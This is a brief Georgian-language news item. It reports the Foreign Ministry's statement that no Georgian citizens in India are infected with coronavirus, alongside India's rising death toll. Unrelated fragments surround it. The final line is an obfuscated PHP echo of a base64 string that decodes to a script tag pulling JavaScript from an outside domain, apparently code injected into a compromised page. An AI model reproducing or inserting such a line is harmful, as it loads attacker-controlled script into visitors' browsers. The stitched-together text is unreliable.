celsiusi
ავერსი შნაიდერი
ინდოეთში მყოფ საქართველოს არც ერთ მოქალაქეს კორონავირუსი არ უფიქსირდება. ამის შესახებ „ინტერპრესნიუსს“ საქართველოს საგარეო საქმეთა სამინისტროში განუცხადეს.
 
მათივე ინფორმაციით, საელჩო ინდოეთში მყოფ საქართველოს მოქალაქეებთან მუდმივ კომუნიკაციაში იმყოფება.
 
ცნობისთვის, ინდოეთში, გასული დღის განმავლობაში კორონავირუსს 3 286 ადამიანის სიცოცხლე ემსხვერპლა და დაღუპულთა საერთო რაოდენობამ 200 000-ს გადააჭარბა. ქვეყანაში მნიშვნელოვნად მატულობს ინფიცირების შემთხვევები. აღსანიშნავია, რომ მხოლოდ გასული კვირის განმავლობაში ინდოეთში 2 მილიონზე მეტი ადამიანი დაინფიცირდა. მედიის ინფორმაციით, დედაქალაქ დელიში არსებულ კრემატორიუმები გადატვირთულია და დაღუპულების ოჯახების წევრებსა და ახლობლებს საათობით უწევთ ლოდინი.
 
წყარო: IPN
1131
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");